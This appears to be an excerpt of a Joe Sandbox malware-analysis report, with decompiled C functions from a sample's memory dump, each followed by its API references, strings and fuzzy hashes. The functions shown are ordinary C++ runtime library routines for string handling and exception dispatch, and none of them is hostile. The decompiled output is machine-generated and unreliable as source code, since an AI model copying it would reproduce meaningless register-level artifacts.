			E0043AB3E(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t41;
				void* _t45;
				intOrPtr _t47;
				intOrPtr* _t54;
				signed int* _t57;
				signed int* _t65;
				void* _t69;
				signed int _t70;
				void* _t71;
				void* _t75;

				_t75 = __eflags;
				_push(0x38);
				E00425719(E0044F5EA, __ebx, __edi, __esi);
				_t65 =  *(_t71 + 0x20);
				_t57 =  *(_t71 + 0x24);
				 *(_t71 - 0x38) =  *(_t71 - 0x38) & 0x00000000;
				 *((intOrPtr*)(_t71 - 0x40)) =  *((intOrPtr*)(_t71 + 8));
				 *((intOrPtr*)(_t71 - 0x34)) = __ecx;
				_t41 = E004013A0(_t71 - 0x3c);
				 *(_t71 - 4) =  *(_t71 - 4) & 0x00000000;
				_push(_t41);
				_push( *((intOrPtr*)( *((intOrPtr*)(_t71 + 0x1c)) + 0x14)));
				_push(_t71 + 0x14);
				_push(_t71 + 0xc);
				_push(_t71 - 0x30);
				_push( *((intOrPtr*)(_t71 - 0x34)));
				_t45 = E0043A01B(_t57, _t65,  *((intOrPtr*)( *((intOrPtr*)(_t71 + 0x1c)) + 0x14)), _t75);
				 *(_t71 - 4) =  *(_t71 - 4) | 0xffffffff;
				_t69 = _t45;
				E004012D0();
				_t47 = _t71 - 0x2f;
				if( *((char*)(_t71 - 0x30)) != 0x2d) {
					_t47 = _t71 - 0x30;
				}
				 *((intOrPtr*)(_t71 - 0x34)) = _t47;
				_t70 = E0044BA5A( *((intOrPtr*)(_t71 - 0x34)), _t71 - 0x44, _t69, _t71 - 0x38);
				if(E00439B42(_t71 + 0xc, _t71 + 0x14) != 0) {
					 *_t65 =  *_t65 | 0x00000001;
				}
				if( *((intOrPtr*)(_t71 - 0x44)) ==  *((intOrPtr*)(_t71 - 0x34)) ||  *(_t71 - 0x38) != 0 || _t70 > 0xffffffff) {
					 *_t65 =  *_t65 | 0x00000002;
					__eflags =  *_t65;
				} else {
					if( *((char*)(_t71 - 0x30)) == 0x2d) {
						_t70 =  ~_t70;
					}
					 *_t57 = _t70;
				}
				_t54 =  *((intOrPtr*)(_t71 - 0x40));
				 *_t54 =  *((intOrPtr*)(_t71 + 0xc));
				 *((intOrPtr*)(_t54 + 4)) =  *((intOrPtr*)(_t71 + 0x10));
				return E00425763(_t57, _t65, _t70);
			}

0x0043ab3e
0x0043ab3e
0x0043ab45
0x0043ab50
0x0043ab53
0x0043ab56
0x0043ab5a
0x0043ab60
0x0043ab66
0x0043ab6e
0x0043ab72
0x0043ab73
0x0043ab77
0x0043ab7b
0x0043ab7f
0x0043ab80
0x0043ab83
0x0043ab88
0x0043ab92
0x0043ab94
0x0043ab9d
0x0043aba0
0x0043aba2
0x0043aba2
0x0043aba5
0x0043abb9
0x0043abcc
0x0043abce
0x0043abce
0x0043abd7
0x0043abf0
0x0043abf0
0x0043abe4
0x0043abe8
0x0043abea
0x0043abea
0x0043abec
0x0043abec
0x0043abf6
0x0043abf9
0x0043abfe
0x0043ac06

APIs

__EH_prolog3_GS.LIBCMT ref: 0043AB45

Part of subcall function 004013A0: std::_Lockit::_Lockit.LIBCPMT ref: 004013BC

Part of subcall function 0043A01B: __EH_prolog3_GS.LIBCMT ref: 0043A022

Part of subcall function 004012D0: std::_Lockit::_Lockit.LIBCPMT ref: 004012DE

__Stoulx.LIBCPMT ref: 0043ABB4

Strings

-, xrefs: 0043ABE4

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: H_prolog3_LockitLockit::_std::_$Stoulx
String ID: -
API String ID: 601206080-2547889144
Opcode ID: 69b92bccaa2b8f78ce264c78bfd12865dd4a42e29936226c1ba94a9cca2e4156
Instruction ID: efb9f87403d24e90a4a26dd067d7d5f8b27843aadcba582d0b9bea412a0537c1
Opcode Fuzzy Hash: 69b92bccaa2b8f78ce264c78bfd12865dd4a42e29936226c1ba94a9cca2e4156
Instruction Fuzzy Hash: 58312671801218AFDF11DF90E981ADEBBB9FF08324F14426BF951A7290E738AE15CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00403630 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00403630(void* __ebx, intOrPtr* __ecx, void* __edi, intOrPtr _a4, char _a8) {
				signed int _t10;
				signed int _t15;
				void* _t18;
				intOrPtr _t19;
				void* _t25;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t29;
				void* _t30;

				_t25 = __edi;
				_t21 = __ecx;
				_t18 = __ebx;
				_t29 = _a4;
				_t28 = __ecx;
				if(_t29 > 0xfffffffe) {
					E0040DF21("string too long");
				}
				_t10 =  *(_t28 + 0x14);
				if(_t10 >= _t29) {
					if(_a8 == 0 || _t29 >= 0x10) {
						if(_t29 == 0) {
							 *((intOrPtr*)(_t28 + 0x10)) = _t29;
							if(_t10 >= 0x10) {
								_t28 =  *_t28;
							}
							 *_t28 = 0;
						}
						asm("sbb eax, eax");
						return  ~_t10;
					} else {
						_push(_t25);
						_t26 =  *((intOrPtr*)(_t28 + 0x10));
						if(_t29 < _t26) {
							_t26 = _t29;
						}
						if(_t10 >= 0x10) {
							_push(_t18);
							_t19 =  *_t28;
							if(_t26 != 0) {
								E004224A0(_t28, _t19, _t26);
								_t30 = _t30 + 0xc;
							}
							_push(_t19);
							_t10 = E00422493();
						}
						 *((intOrPtr*)(_t28 + 0x10)) = _t26;
						 *(_t28 + 0x14) = 0xf;
						 *((char*)(_t26 + _t28)) = 0;
						asm("sbb eax, eax");
						return  ~_t10;
					}
				} else {
					_t15 = E00402F60(_t21, _t29,  *((intOrPtr*)(_t28 + 0x10)));
					asm("sbb eax, eax");
					return  ~_t15;
				}
			}

0x00403630
0x00403630
0x00403630
0x00403631
0x00403636
0x0040363b
0x00403642
0x00403642
0x00403647
0x0040364c
0x0040366a
0x004036ba
0x004036bc
0x004036c2
0x004036c4
0x004036c4
0x004036c6
0x004036c6
0x004036cd
0x004036d3
0x00403671
0x00403671
0x00403672
0x00403677
0x00403679
0x00403679
0x0040367e
0x00403680
0x00403681
0x00403685
0x0040368a
0x0040368f
0x0040368f
0x00403692
0x00403693
0x0040369b
0x0040369c
0x0040369f
0x004036a8
0x004036af
0x004036b5
0x004036b5
0x0040364e
0x00403653
0x0040365c
0x00403662
0x00403662

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00403642

Part of subcall function 0040DF21: std::exception::exception.LIBCMT ref: 0040DF36
Part of subcall function 0040DF21: __CxxThrowException@8.LIBCMT ref: 0040DF4B
Part of subcall function 0040DF21: std::exception::exception.LIBCMT ref: 0040DF5C

_memmove.LIBCMT ref: 0040368A

Strings

string too long, xrefs: 0040363D

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: string too long
API String ID: 1785806476-2556327735
Opcode ID: c60c15fb1d7f899e275ad0a82715742ac058946b6ab4d8c56e666e6c58f23533
Instruction ID: bd3efde7c5abcad00fffbe24395a0d910f041e73f2c015f9bce23027b2ffe548
Opcode Fuzzy Hash: c60c15fb1d7f899e275ad0a82715742ac058946b6ab4d8c56e666e6c58f23533
Instruction Fuzzy Hash: 211108711447186AE734AD68A540A3BBA9CAB61715F100E3FE097D37C1DB76A548825C

Uniqueness

Uniqueness Score: -1.00%

Function 00403B10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00403B10(signed int __ecx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t12;
				char* _t19;
				intOrPtr _t23;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr* _t37;

				_t23 = _a4;
				_t37 = __ecx;
				_t12 =  *((intOrPtr*)(__ecx + 0x10));
				if((__ecx | 0xffffffff) - _t12 <= _t23) {
					_t12 = E0040DF21("string too long");
				}
				if(_t23 == 0) {
					L14:
					return _t37;
				} else {
					_t33 = _t12 + _t23;
					if(_t33 > 0xfffffffe) {
						_t12 = E0040DF21("string too long");
					}
					_t27 =  *((intOrPtr*)(_t37 + 0x14));
					if(_t27 >= _t33) {
						if(_t33 != 0) {
							goto L7;
						} else {
							 *((intOrPtr*)(_t37 + 0x10)) = _t33;
							if(_t27 < 0x10) {
								_t19 = _t37;
								 *_t19 = 0;
								return _t19;
							} else {
								 *((char*)( *_t37)) = 0;
								return _t37;
							}
						}
					} else {
						E00402F60(_t37, _t33, _t12);
						if(_t33 == 0) {
							goto L14;
						} else {
							L7:
							E00402400(_t37,  *((intOrPtr*)(_t37 + 0x10)), _t23, _a8);
							 *((intOrPtr*)(_t37 + 0x10)) = _t33;
							if( *((intOrPtr*)(_t37 + 0x14)) < 0x10) {
								 *((char*)(_t37 + _t33)) = 0;
								goto L14;
							} else {
								 *((char*)( *_t37 + _t33)) = 0;
								return _t37;
							}
						}
					}
				}
			}

0x00403b11
0x00403b16
0x00403b18
0x00403b22
0x00403b29
0x00403b29
0x00403b31
0x00403bab
0x00403bb0
0x00403b33
0x00403b33
0x00403b39
0x00403b40
0x00403b40
0x00403b45
0x00403b4a
0x00403b83
0x00000000
0x00403b85
0x00403b85
0x00403b8b
0x00403b9b
0x00403b9e
0x00403ba2
0x00403b8d
0x00403b90
0x00403b97
0x00403b97
0x00403b8b
0x00403b4c
0x00403b50
0x00403b57
0x00000000
0x00403b59
0x00403b59
0x00403b65
0x00403b6e
0x00403b71
0x00403ba7
0x00000000
0x00403b73
0x00403b75
0x00403b7e
0x00403b7e
0x00403b71
0x00403b57
0x00403b4a

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00403B29

Part of subcall function 0040DF21: std::exception::exception.LIBCMT ref: 0040DF36
Part of subcall function 0040DF21: __CxxThrowException@8.LIBCMT ref: 0040DF4B
Part of subcall function 0040DF21: std::exception::exception.LIBCMT ref: 0040DF5C

std::_Xinvalid_argument.LIBCPMT ref: 00403B40

Strings

string too long, xrefs: 00403B24, 00403B3B

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
String ID: string too long
API String ID: 963545896-2556327735
Opcode ID: ef2a772430474ec458c0e0900fae3990066c40ae9de1b4d2d68c88f7a30df1c0
Instruction ID: a9c714bbb24fb1c086cc0828113db01585fcf03ede6a18d11b91f206ea06c59d
Opcode Fuzzy Hash: ef2a772430474ec458c0e0900fae3990066c40ae9de1b4d2d68c88f7a30df1c0
Instruction Fuzzy Hash: 33119632300A114BD7219E5D9480B1AF7FDAFD5766B20463FF192A72D2C7B8A9058369

Uniqueness

Uniqueness Score: -1.00%

Function 004407AE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E004407AE(intOrPtr* __ecx, void* __edx, intOrPtr* _a4, signed int _a8, intOrPtr _a12) {
				void* __ebx;
				void* __edi;
				signed int _t16;
				intOrPtr* _t19;
				intOrPtr* _t22;
				intOrPtr* _t25;
				void* _t26;
				intOrPtr* _t28;
				void* _t31;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr* _t36;

				_t31 = __edx;
				_t27 = __ecx;
				_t16 = _a8;
				_t25 = _a4;
				_t33 =  *((intOrPtr*)(_t25 + 0x10));
				_t36 = __ecx;
				if(_t33 < _t16) {
					_t16 = E0040DF6E("invalid string position");
				}
				_t34 = _t33 - _t16;
				if(_a12 < _t34) {
					_t34 = _a12;
				}
				if(_t36 != _t25) {
					if(E0043E94C(_t25, _t27, _t31, _t34, _t34, 0) != 0) {
						if( *((intOrPtr*)(_t25 + 0x14)) < 8) {
							_t19 = _t25;
						} else {
							_t19 =  *_t25;
						}
						if( *((intOrPtr*)(_t36 + 0x14)) < 8) {
							_t28 = _t36;
						} else {
							_t28 =  *_t36;
						}
						_t26 = _t34 + _t34;
						E004224A0(_t28, _t19 + _a8 * 2, _t26);
						 *((intOrPtr*)(_t36 + 0x10)) = _t34;
						if( *((intOrPtr*)(_t36 + 0x14)) < 8) {
							_t22 = _t36;
						} else {
							_t22 =  *_t36;
						}
						 *((short*)(_t26 + _t22)) = 0;
					}
				} else {
					E0043D41E(_t27, _t34 + _t16, 0xffffffff);
					E0043D41E(_t36, 0, _a8);
				}
				return _t36;
			}

0x004407ae
0x004407ae
0x004407b3
0x004407b7
0x004407bc
0x004407bf
0x004407c3
0x004407ca
0x004407ca
0x004407cf
0x004407d4
0x004407d6
0x004407d6
0x004407db
0x004407ff
0x00440805
0x0044080b
0x00440807
0x00440807
0x00440807
0x00440811
0x00440817
0x00440813
0x00440813
0x00440813
0x0044081c
0x00440825
0x00440831
0x00440834
0x0044083a
0x00440836
0x00440836
0x00440836
0x0044083e
0x0044083e
0x004407dd
0x004407e2
0x004407ee
0x004407ee
0x00440848

APIs

std::_Xinvalid_argument.LIBCPMT ref: 004407CA

Part of subcall function 0040DF6E: std::exception::exception.LIBCMT ref: 0040DF83
Part of subcall function 0040DF6E: __CxxThrowException@8.LIBCMT ref: 0040DF98
Part of subcall function 0040DF6E: std::exception::exception.LIBCMT ref: 0040DFA9

Part of subcall function 0043E94C: std::_Xinvalid_argument.LIBCPMT ref: 0043E962

_memmove.LIBCMT ref: 00440825

Strings

invalid string position, xrefs: 004407C5

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
String ID: invalid string position
API String ID: 3404309857-1799206989
Opcode ID: 2ea1689e2c9fc5d391ae99c86f2daa490001d37fee80014cbd73e92615af18bc
Instruction ID: e550104f446407597f47ac4a125a19c7d0b434eb7a49323cdb4a6043fec6bbc9
Opcode Fuzzy Hash: 2ea1689e2c9fc5d391ae99c86f2daa490001d37fee80014cbd73e92615af18bc
Instruction Fuzzy Hash: 34112B31704214EBDB20AF59DDC096A73A5EF85719B10452FFA124B241EB34EC25CBEA

Uniqueness

Uniqueness Score: -1.00%

Function 0043D41E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0043D41E(intOrPtr* __ecx, signed int _a4, intOrPtr _a8) {
				intOrPtr _t15;
				intOrPtr _t16;
				signed int _t25;
				intOrPtr* _t27;
				signed int _t30;
				intOrPtr* _t31;
				intOrPtr _t32;
				intOrPtr* _t33;
				intOrPtr _t36;
				intOrPtr* _t38;

				_t38 = __ecx;
				_t15 =  *((intOrPtr*)(__ecx + 0x10));
				_t30 = _a4;
				if(_t15 < _t30) {
					_t15 = E0040DF6E("invalid string position");
				}
				_t36 = _a8;
				_t16 = _t15 - _t30;
				if(_t16 < _t36) {
					_t36 = _t16;
				}
				if(_t36 != 0) {
					_t32 =  *((intOrPtr*)(_t38 + 0x14));
					if(_t32 < 8) {
						_t27 = _t38;
					} else {
						_t27 =  *_t38;
					}
					if(_t32 < 8) {
						_t33 = _t38;
					} else {
						_t33 =  *_t38;
					}
					E00422810(_t33 + _t30 * 2, _t27 + (_t30 + _t36) * 2, _t16 - _t36 + _t16 - _t36);
					_t25 =  *(_t38 + 0x10) - _t36;
					 *(_t38 + 0x10) = _t25;
					if( *((intOrPtr*)(_t38 + 0x14)) < 8) {
						_t31 = _t38;
					} else {
						_t31 =  *_t38;
					}
					 *((short*)(_t31 + _t25 * 2)) = 0;
				}
				return _t38;
			}

0x0043d424
0x0043d426
0x0043d429
0x0043d42f
0x0043d436
0x0043d436
0x0043d43b
0x0043d43e
0x0043d442
0x0043d444
0x0043d444
0x0043d448
0x0043d44a
0x0043d451
0x0043d457
0x0043d453
0x0043d453
0x0043d453
0x0043d45c
0x0043d462
0x0043d45e
0x0043d45e
0x0043d45e
0x0043d474
0x0043d47f
0x0043d485
0x0043d489
0x0043d48f
0x0043d48b
0x0043d48b
0x0043d48b
0x0043d493
0x0043d493
0x0043d49c

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0043D436

Part of subcall function 0040DF6E: std::exception::exception.LIBCMT ref: 0040DF83
Part of subcall function 0040DF6E: __CxxThrowException@8.LIBCMT ref: 0040DF98
Part of subcall function 0040DF6E: std::exception::exception.LIBCMT ref: 0040DFA9

_memmove.LIBCMT ref: 0043D474

Strings

invalid string position, xrefs: 0043D431

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: invalid string position
API String ID: 1785806476-1799206989
Opcode ID: 7742182d26ae45732307bab236175116d02a3ded7d317f8175bf553c004c8772
Instruction ID: 837cee230f70ab893b4aa658509e8c7c077641c7091e662a90227b2bfdd30604
Opcode Fuzzy Hash: 7742182d26ae45732307bab236175116d02a3ded7d317f8175bf553c004c8772
Instruction Fuzzy Hash: BA119B317002159BC720CEADED8085AB3BAFFD9714B24592FE456C7605DA34F845C798

Uniqueness

Uniqueness Score: -1.00%

Function 00401B40 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 16%

			E00401B40(void* __ebx, void* __edi) {
				void* __ecx;
				void* _t8;
				signed int _t12;
				signed int* _t18;
				intOrPtr* _t20;
				intOrPtr* _t21;
				signed int _t29;
				intOrPtr* _t32;
				signed int _t37;
				intOrPtr* _t39;
				void* _t41;

				_push(_t20);
				_t39 = _t20;
				_t18 =  *(_t39 + 0x38);
				 *_t39 = 0x451544;
				if(_t18 != 0) {
					_t29 =  *_t18;
					if(_t29 != 0) {
						_t2 = _t41 + 0x10; // 0x414952
						E0040D950(_t2, 0);
						_t12 =  *(_t29 + 4);
						if(_t12 != 0 && _t12 < 0xffffffff) {
							 *(_t29 + 4) = _t12 - 1;
						}
						asm("sbb esi, esi");
						_t6 = _t41 + 0x10; // 0x414952
						E0040D978(_t6);
						_t37 =  !( ~( *(_t29 + 4))) & _t29;
						if(_t37 != 0) {
							 *((intOrPtr*)( *((intOrPtr*)( *_t37))))(1);
						}
						_pop(_t31);
					}
					_push(_t18);
					_t8 = E00422493();
					_t41 = _t41 + 4;
				}
				_t21 = _t39 + 4;
				_push(_t31);
				_t32 = _t21;
				E0040E61F(_t8,  *_t32);
				_push( *_t32);
				return E00422493();
			}

0x00401b40
0x00401b43
0x00401b45
0x00401b48
0x00401b51
0x00401b54
0x00401b58
0x00401b5c
0x00401b60
0x00401b65
0x00401b6a
0x00401b72
0x00401b72
0x00401b7b
0x00401b7d
0x00401b83
0x00401b88
0x00401b8a
0x00401b94
0x00401b94
0x00401b96
0x00401b96
0x00401b97
0x00401b98
0x00401b9d
0x00401ba0
0x00401ba1
0x0040e10a
0x0040e10b
0x0040e10f
0x0040e114
0x0040e11e

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00401B60

Strings

RIA, xrefs: 00401B5C, 00401B7D
RIA, xrefs: 00401B40, 00401B75, 0040E10A

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: LockitLockit::_std::_
String ID: RIA$RIA
API String ID: 3382485803-82463296
Opcode ID: cb371646dfa00789de61f16c2ff55c843a53081c63c73986a59b3aba36ecdcaa
Instruction ID: 80f0ed1372ec2a355132af408efdb72e27f3f749613f752e46b14dac9361f7ad
Opcode Fuzzy Hash: cb371646dfa00789de61f16c2ff55c843a53081c63c73986a59b3aba36ecdcaa
Instruction Fuzzy Hash: C8012B726042206BD710DF15DC41DA677A8EF81324B14463FF8596B2D5EB76BC04C6C9

Uniqueness

Uniqueness Score: -1.00%

Function 00402DA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00402DA0(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t10;
				intOrPtr _t11;
				intOrPtr _t16;
				intOrPtr* _t19;
				intOrPtr _t24;
				intOrPtr _t27;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t34;

				_t34 = __ecx;
				_t10 =  *((intOrPtr*)(__ecx + 0x10));
				_t24 = _a4;
				if(_t10 < _t24) {
					_t10 = E0040DF6E("invalid string position");
				}
				_t31 = _a8;
				_t11 = _t10 - _t24;
				if(_t11 < _t31) {
					_t31 = _t11;
				}
				if(_t31 == 0) {
					L14:
					return _t34;
				} else {
					_t27 =  *((intOrPtr*)(_t34 + 0x14));
					if(_t27 < 0x10) {
						_t19 = _t34;
					} else {
						_t19 =  *_t34;
					}
					if(_t27 < 0x10) {
						_t28 = _t34;
					} else {
						_t28 =  *_t34;
					}
					E00422810(_t28 + _t24, _t19 + _t24 + _t31, _t11 - _t31);
					_t16 =  *((intOrPtr*)(_t34 + 0x10)) - _t31;
					 *((intOrPtr*)(_t34 + 0x10)) = _t16;
					if( *((intOrPtr*)(_t34 + 0x14)) < 0x10) {
						 *((char*)(_t34 + _t16)) = 0;
						goto L14;
					} else {
						 *((char*)( *_t34 + _t16)) = 0;
						return _t34;
					}
				}
			}

0x00402da1
0x00402da3
0x00402da6
0x00402dac
0x00402db3
0x00402db3
0x00402db9
0x00402dbd
0x00402dc1
0x00402dc3
0x00402dc3
0x00402dc7
0x00402e18
0x00402e1c
0x00402dc9
0x00402dc9
0x00402dd0
0x00402dd6
0x00402dd2
0x00402dd2
0x00402dd2
0x00402ddb
0x00402de1
0x00402ddd
0x00402ddd
0x00402ddd
0x00402dee
0x00402df9
0x00402dff
0x00402e03
0x00402e14
0x00000000
0x00402e05
0x00402e07
0x00402e0f
0x00402e0f
0x00402e03

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00402DB3

Part of subcall function 0040DF6E: std::exception::exception.LIBCMT ref: 0040DF83
Part of subcall function 0040DF6E: __CxxThrowException@8.LIBCMT ref: 0040DF98
Part of subcall function 0040DF6E: std::exception::exception.LIBCMT ref: 0040DFA9

_memmove.LIBCMT ref: 00402DEE

Strings

invalid string position, xrefs: 00402DAE

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: invalid string position
API String ID: 1785806476-1799206989
Opcode ID: ef3ca5005556ad42928a27cd27866b0b2f987056f0795cd33fdca2fbbb6fea44
Instruction ID: 14c1c7ca4d8e8ead37506e2087af09fc30929425afe9b43dd217abbf303015ba
Opcode Fuzzy Hash: ef3ca5005556ad42928a27cd27866b0b2f987056f0795cd33fdca2fbbb6fea44
Instruction Fuzzy Hash: 180192313046114BD325996CEE8466AB3EAAFD6700B244D3FE081E77C5C6F4EC8687A8

Uniqueness

Uniqueness Score: -1.00%

Function 00426BC2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 88%

			E00426BC2(void* __ebx, void* __edx, void* __edi, intOrPtr* __esi, void* __eflags) {
				intOrPtr _t17;
				intOrPtr* _t28;
				void* _t29;

				_t30 = __eflags;
				_t28 = __esi;
				_t27 = __edi;
				_t26 = __edx;
				 *((intOrPtr*)(__edi - 4)) =  *((intOrPtr*)(_t29 - 0x24));
				E0042303D(__ebx, __edx, __edi, __eflags,  *((intOrPtr*)(_t29 - 0x28)));
				 *((intOrPtr*)(E00427FEA(__edx, __edi, __eflags) + 0x88)) =  *((intOrPtr*)(_t29 - 0x2c));
				_t17 = E00427FEA(_t26, _t27, _t30);
				 *((intOrPtr*)(_t17 + 0x8c)) =  *((intOrPtr*)(_t29 - 0x30));
				if( *__esi == 0xe06d7363 &&  *((intOrPtr*)(__esi + 0x10)) == 3) {
					_t17 =  *((intOrPtr*)(__esi + 0x14));
					if(_t17 == 0x19930520 || _t17 == 0x19930521 || _t17 == 0x19930522) {
						if( *((intOrPtr*)(_t29 - 0x34)) == 0) {
							_t37 =  *((intOrPtr*)(_t29 - 0x1c));
							if( *((intOrPtr*)(_t29 - 0x1c)) != 0) {
								_t17 = E00423016(_t37,  *((intOrPtr*)(_t28 + 0x18)));
								_t38 = _t17;
								if(_t17 != 0) {
									_push( *((intOrPtr*)(_t29 + 0x10)));
									_push(_t28);
									return E0042694E(_t38);
								}
							}
						}
					}
				}
				return _t17;
			}

0x00426bc2
0x00426bc2
0x00426bc2
0x00426bc2
0x00426bc5
0x00426bcb
0x00426bd9
0x00426bdf
0x00426be7
0x00426bf3
0x00426bfb
0x00426c03
0x00426c17
0x00426c19
0x00426c1d
0x00426c22
0x00426c28
0x00426c2a
0x00426c2c
0x00426c2f
0x00000000
0x00426c36
0x00426c2a
0x00426c1d
0x00426c17
0x00426c03
0x00426c37

APIs

Part of subcall function 0042303D: __getptd.LIBCMT ref: 00423043
Part of subcall function 0042303D: __getptd.LIBCMT ref: 00423053

__getptd.LIBCMT ref: 00426BD1

Part of subcall function 00427FEA: __getptd_noexit.LIBCMT ref: 00427FED
Part of subcall function 00427FEA: __amsg_exit.LIBCMT ref: 00427FFA

__getptd.LIBCMT ref: 00426BDF

Strings

csm, xrefs: 00426BED

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: bd83a9c6e8fd16ede2735052553d0212380c5eb09d3c5b747094f6a2962ce230
